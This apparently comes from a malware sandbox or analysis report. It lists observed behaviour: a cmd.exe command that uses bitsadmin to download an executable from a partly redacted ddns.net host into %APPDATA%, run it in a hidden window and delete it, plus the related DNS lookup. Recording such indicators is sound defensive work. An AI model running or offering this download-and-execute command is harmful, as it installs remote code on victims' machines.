Technical Information
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer 0422 http://pr######lfha.ddns.net:8080/a %APPDATA%\0422.exe&%APPDATA%\0422.exe&del %APPDATA%\0422.exe
- 'pr#####alfha.ddns.net':8080
- DNS ASK pr#####alfha.ddns.net
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer 0422 http://pr######lfha.ddns.net:8080/a %APPDATA%\0422.exe&%APPDATA%\0422.exe&del %APPDATA%\0422.exe' (with hidden window)
- '<SYSTEM32>\bitsadmin.exe' /transfer 0422 http://pr######lfha.ddns.net:8080/a %APPDATA%\0422.exe